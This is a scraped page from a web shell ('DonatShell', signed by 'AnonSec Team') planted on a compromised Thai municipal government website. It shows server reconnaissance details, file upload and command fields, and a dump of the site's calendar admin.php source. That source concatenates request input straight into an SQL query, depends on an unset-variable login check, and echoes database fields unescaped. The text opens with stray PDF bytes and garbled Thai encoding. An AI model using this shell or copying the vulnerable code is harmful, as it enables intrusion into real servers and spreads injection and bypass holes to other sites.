%PDF-1.5 % ºaâÚÎΞ-ÌE1�ØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 122.155.177.87  /  Your IP : 122.155.177.87
Web Server : Apache/2
System : Linux cat177-87.static.lnwhostname.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64
User : phunphin ( 1164)
PHP Version : 5.3.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,putenv,eval
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/phunphin/domains/phunphin.go.th/public_html/calendar/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/phunphin/domains/phunphin.go.th/public_html/calendar//admin.php
<?
		session_start();
		if($user==""){
		$message = "¡ÃØ³Ò Login ¡è͹.";
			$url = "../admin/index.php";
			include("../admin/alert.php");
			exit;
       }
?>   
<?php require_once('../admin/Connections/conndb.php'); ?>
<?php
//echo $this_date;
/*$date_i=$_GET[date_i];
$temp=explode("/",$date_i);
$input=$temp[2]."-".$temp[1]."-".$temp[0];
//$sql="select * from table where field_date='$input' "*/
//echo $input;
if(isset($_POST[this_date])){
		$date=$_POST[this_date];

}
else{
		$date=$_GET[date];
}

$temp=explode("-",$date);	

$input=$temp[2]."-".$temp[1]."-".$temp[0];
//	echo $input;


$y=$temp[2]+543;
$m=$temp[1];
							switch($m)
								{
										case "1":
										$printmonth = "Á.¤.";
										break;
										case "2":
										$printmonth = "¡.¾.";
										break;
										case "3":
										$printmonth = "ÁÕ.¤.";
										break;
										case "4":
										$printmonth = "àÁ.Â.";
										break;
										case "5":
										$printmonth = "¾.¤.";
										break;
										case "6":
										$printmonth = "ÁÔ.Â.";
										break;
										case "7":
										$printmonth = "¡.¤.";
										break;
										case "8":
										$printmonth = "Ê.¤.";
										break;
										case "9":
										$printmonth = "¡.Â.";
										break;
										case "10":
										$printmonth = "µ.¤.";
										break;
										case "11":
										$printmonth = "¾.Â.";
										break;
										case "12":
										$printmonth = "¸.¤.";
										break;
										}

	$date_review=$temp[0]." ".$printmonth." ".$y;

/*if(isset($_POST[person])){
		$person=$_POST[person];
}
else{
		$person=$_GET[person];
}*/
//echo " new = ".$person;
if($person == " " || $person == "all"   || $persons=="0"){
	//echo "empty value".$_POST['person'];
	mysql_select_db($database_conndb, $conndb);
	$query_rsNews = "SELECT * FROM calendar ORDER BY person  ASC, created DESC";
	$rsNews = mysql_query($query_rsNews, $conndb) or die(mysql_error());
	$row_rsNews = mysql_fetch_assoc($rsNews);
	$totalRows_rsNews = mysql_num_rows($rsNews);

}

else {
		//echo "not empty value".$_POST['person'];
	//	$created=$years."-".$month."-".$dated;
		mysql_select_db($database_conndb, $conndb);
		$query_rsNews = "SELECT * FROM calendar where created = '".$input."' ORDER BY person";
		//echo $query_rsNews;
		$rsNews = mysql_query($query_rsNews, $conndb) or die(mysql_error());
		$row_rsNews = mysql_fetch_assoc($rsNews);
		$totalRows_rsNews = mysql_num_rows($rsNews);
}	
?>       
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">     
<html><!-- InstanceBegin template="/Templates/template_a.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>                                                                                                    
<!-- InstanceBeginEditable name="doctitle" -->
<script>
function confirmDelete(delUrl) {
  if (confirm("Â×¹Âѹ¡ÒÃź¢éÍÁÙÅ")) {
    document.location = delUrl;
  }
}
</script>
<link href='cal/CalendarControl.css' rel='stylesheet' type='text/css'>
<script language='JavaScript' src='cal/CalendarControl.js'></script>
<!-- InstanceEndEditable --> 
<?php
require_once('../admin/Connections/conndb.php'); 
mysql_select_db($database_conndb, $conndb);
?>
<title>ͧ¤ì¡ÒúÃÔËÒÃÊèǹµÓºÅ¾Ø¹¾Ô¹ µÓºÅ¾Ø¹¾Ô¹ ÍÓàÀ;ع¾Ô¹ ¨Ñ§ËÇÑ´ÊØÃÒÉ®Ãì¸Ò¹Õ : http://www.phunphin.go.th</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../styles.css" rel="stylesheet" type="text/css">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->


<!-- You can use Open Graph tags to customize link previews.
    Learn more: https://developers.facebook.com/docs/sharing/webmasters -->
  <meta property="og:url"           content="https://www.your-domain.com/your-page.html" />
  <meta property="og:type"          content="website" />
  <meta property="og:title"         content="Your Website Title" />
  <meta property="og:description"   content="Your description" />
  <meta property="og:image"         content="https://www.your-domain.com/path/image.jpg" />



<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
	background-color:#006cd8;	
}
-->
</style>

<!--styles -->
<link href="../styles.css" rel="stylesheet" type="text/css" />
<!--styles -->


<style type="text/css">
<!--
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
.style1 {color: #000000}
-->
</style>

<!--font-->
<link href="https://fonts.googleapis.com/css?family=Chakra+Petch|Kanit|Pridi&display=swap" rel="stylesheet">
<!--font-->

<style type="text/css">
<!--
.style4 {font-family: 'Chakra Petch', sans-serif}
-->
</style>


</head>

<body  background="../images/0bg1_edit01.png" style="background-repeat:no-repeat; background-position:top">











<!-- content -->
<div align="center">
  <table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td height="605" align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td height="55" align="center" valign="top"><table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
        <tr>
          <td align="center" valign="top"><a href="http://www.phunphin.go.th/index.php"><img src="../images/1menutop_01.png"  alt=""/></a></td>
          </tr>
      </table></td>
    </tr>
    <tr>
      <td align="center">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top">
      <table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
        <tr>
          <td align="center" valign="top">
          
          <table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
        <tr>
          <td align="center" valign="top"><img src="../images/bg_con2_01.png" width="100"></td>
        </tr>
        <tr>
          <td align="center" valign="top" background="../images/bg_con2_02.png" style="background-repeat:repeat; background-position:top"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0">
            <tr>
              <td align="center" valign="top"><!-- InstanceBeginEditable name="EditRegion3" -->
        <table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="0">
          <tr>
             <td class="title2"><div align="center"><img src="../images/bnh24.png"></div></td>
          </tr>
          <tr>
            <td class="styles1"><div align="right"><a href="../admin/main.php" class="styles2">˹éÒ Admin </a>| »¯Ô·Ô¹¼ÙéºÃÔËÒà | <a href="add.php" class="styles2">à¾ÔèÁÇÒÃÐ </a>| <a href="../admin/signout.php" class="styles2">ÍÍ¡¨Ò¡Ãкº </a></div></td>
          </tr>
          <tr>
            <td class="styles1">&nbsp;</td>
          </tr>
          <tr>
            <td class="styles1"><form id="form1" name="form1" method="POST" action="admin.php">
              <div align="right">àÅ×Í¡Çѹ·Õè ::  <style>
				input {border:1px solid #0080C0}
				.dateinput{background:url(images/date.gif) top left no-repeat; border:solid 1px #0080C0;
				padding-left:20px;
			}
			</style>
			  <input name='this_date' type='text' id='date' value='<?=date('j-n-Y') ?>' class='dateinput' onfocus='showCalendarControl(this);'  size='10' />
    <label>
    <input name="Submit" type="submit" class="btn-s" value="µ¡Å§">
    </label>
              </div>
            </form></td>
          </tr>
          <tr>
            <td colspan="3" align="left" valign="top" class="title"><div align="center">»¯Ô·Ô¹»¯ÔºÑµÔ§Ò¹ »ÃШÓÇѹ·Õè 
              <?  echo $date_review;	 ?>
            </div></td>
          </tr>
          <tr>
            <td colspan="3" align="left" valign="top">&nbsp;</td>
          </tr>
                
          <tr>
            <td colspan="3" align="left" valign="top"><div align="center">  
			<?php if ($totalRows_rsNews > 0) { // Show if recordset not empty 
                      do { ?>
              <table width="100%" border="0" cellpadding="0" cellspacing="1" bgcolor="#999999">
                <tr>
                  <td height="25" colspan="3" background="../images/bg4.gif" class="styles"><div align="left">&nbsp;&nbsp;
				    <? 
				  			if($row_rsNews[person]== "1"){
						echo "¹Ò¡  ͺµ.";
					  } else if($row_rsNews[person]== "2"){
					  	echo "Ãͧ¹Ò¡¤¹·Õè 1";
					  }else if($row_rsNews[person]== "3"){
					  	echo "Ãͧ¹Ò¡¤¹·Õè 2";
					  }else if($row_rsNews[person]== "4"){
					  	echo "Êӹѡ§Ò¹»ÅÑ´";
					  }else if($row_rsNews[person]== "5"){
					  	echo "Êèǹ¤Åѧ";
					  }else if($row_rsNews[person]== "6"){
					  	echo "Êèǹâ¸Ò";
					  }
				  ?> </div></td>
                  <td width="15%" height="25" background="../images/bg4.gif" class="styles"><div align="center"><a href="edit.php?id=<?php echo $row_rsNews[id]; ?>"><img src="images/edit.gif" alt="á¡éä¢" width="13" height="13" border="0"></a>&nbsp;&nbsp;  <a href="javascript:confirmDelete('delete.php?id=<?php echo $row_rsNews[id]; ?>')"> <img src="images/delete.gif" alt="źËÑÇ¢éÍ" width="18" height="18" border="0"></a></div></td>
                </tr>
                <tr>
                  <td width="10%" height="20" bgcolor="#FFD6C4" class="styles1"><div align="center">àÇÅÒ</div></td>
                  <td width="60%" height="20" bgcolor="#FFD6C4" class="styles1"><div align="center">ÇÒÃЧҹ</div></td>
                  <td width="15%" height="20" bgcolor="#FFD6C4" class="styles1"><div align="center">ʶҹ·Õè</div></td>
                  <td width="15%" height="20" bgcolor="#FFD6C4" class="styles1"><div align="center">à¨éÒÀÒ¾</div></td>
                </tr>
				<?
				if($row_rsNews[time_1]!="" || $row_rsNews[detail_1]!="" || $row_rsNews[where_1]!="" || $row_rsNews[by_1]!="") { 
				?>
            		<tr>
						  <td width="10%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="center">
						    <?php 	echo $row_rsNews[time_1]; ?>
				      </div></td>				 
						  <td width="60%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1">&nbsp;&nbsp;						    <?php 	echo $row_rsNews[detail_1]; ?></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[where_1]; ?>
				      </div></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[by_1]; ?>
				      </div></td>
					</tr>
					<? } 
				if($row_rsNews[time_2]!="" || $row_rsNews[detail_2]!="" || $row_rsNews[where_2]!="" || $row_rsNews[by_2]!="") {  ?>
           				<tr>
						  <td width="10%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="center">
						    <?php 	echo $row_rsNews[time_2]; ?>
					      </div></td>				 
						  <td width="60%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1">&nbsp;&nbsp;						    <?php 	echo $row_rsNews[detail_2]; ?></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[where_2]; ?>
					      </div></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[by_2]; ?>
					      </div></td>
						</tr>
				<? } 
				if($row_rsNews[time_3]!="" || $row_rsNews[detail_3]!="" || $row_rsNews[where_3]!="" || $row_rsNews[by_3]!="") {  ?>
   					<tr>
						  <td width="10%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="center">
						    <?php 	echo $row_rsNews[time_3]; ?>
				      </div></td>				 
						  <td width="60%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1">&nbsp;&nbsp;						    <?php 	echo $row_rsNews[detail_3]; ?></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[where_3]; ?>
				      </div></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[by_3]; ?>
				      </div></td>
					</tr>		
				<? } 
				 if($row_rsNews[time_4]!="" || $row_rsNews[detail_4]!="" || $row_rsNews[where_4]!="" || $row_rsNews[by_4]!="") {  ?>
					<tr>
						  <td width="10%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="center">
						    <?php 	echo $row_rsNews[time_4]; ?>
				      </div></td>				 
						  <td width="60%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1">&nbsp;&nbsp;						    <?php 	echo $row_rsNews[detail_4]; ?></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[where_4]; ?>
				      </div></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[by_4]; ?>
				      </div></td>
					</tr>
				<? } 							
				if($row_rsNews[time_5]!="" || $row_rsNews[detail_5]!="" || $row_rsNews[where_5]!="" || $row_rsNews[by_5]!="") {  ?>
						<tr>
						  <td width="10%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="center">
						    <?php 	echo $row_rsNews[time_5]; ?>
					      </div></td>				 
						  <td width="60%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1">&nbsp;&nbsp;						    <?php 	echo $row_rsNews[detail_5]; ?></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[where_5]; ?>
					      </div></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[by_5]; ?>
					      </div></td>
						</tr>
				<? }
				if($row_rsNews[time_6]!="" || $row_rsNews[detail_6]!="" || $row_rsNews[where_6]!="" || $row_rsNews[by_6]!="") {  ?>
						<tr>
						  <td width="10%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="center">
						    <?php 	echo $row_rsNews[time_6]; ?>
					      </div></td>				 
						  <td width="60%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1">&nbsp;&nbsp;						    <?php 	echo $row_rsNews[detail_6]; ?></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[where_6]; ?>
					      </div></td>
						  <td width="15%" height="20" valign="top" bgcolor="#FFFFFF" class="styles1"><div align="left">
						    &nbsp;&nbsp;
						    <?php 	echo $row_rsNews[by_6]; ?>
					      </div></td>
						</tr>            
				<? } ?>				 
              </table>
			  <?php  } while ($row_rsNews = mysql_fetch_assoc($rsNews)); 
							} // Show if recordset not empty ?>
            </div></td>
          </tr>
		  <?if ($totalRows_rsNews == 0) { // Show if recordset empty ?>
				  <tr>
				   <td height="100" colspan="4" bgcolor="#FFFFFF" class="red"><div align="center">äÁèÁÕÇÒÃЧҹ
				   </div></td>
				  </tr> <? }
				?>

          <tr>
            <td colspan="3" align="left" valign="top">&nbsp;</td>
          </tr>
        </table>
      <!-- InstanceEndEditable --></td>
            </tr>
            <tr>
              <td align="center" valign="top">&nbsp;</td>
            </tr>
          </table></td>
        </tr>
        <tr>
          <td align="center" valign="top"><img src="../images/bg_con2_04.png" width="1000"></td>
        </tr>
      </table>          </td>
        </tr>
      </table>      </td>
    </tr>
  </table>
</div>
<!-- end_content -->

<tr><td><a style="display:scroll;position:fixed;bottom:5px;right:5px;" class="backtotop" href="#top" rel="nofollow" title="Back to Top"><img src="../images/up.png" border="0" /></a></td> 

</tr>









</body>
<!-- InstanceEnd --></html>
<?php
mysql_free_result($rsNews);

	 if($conndb)
	 {
	  mysql_close($conndb);
	  unset($conndb);
	 }
?>

Anon7 - 2022
AnonSec Team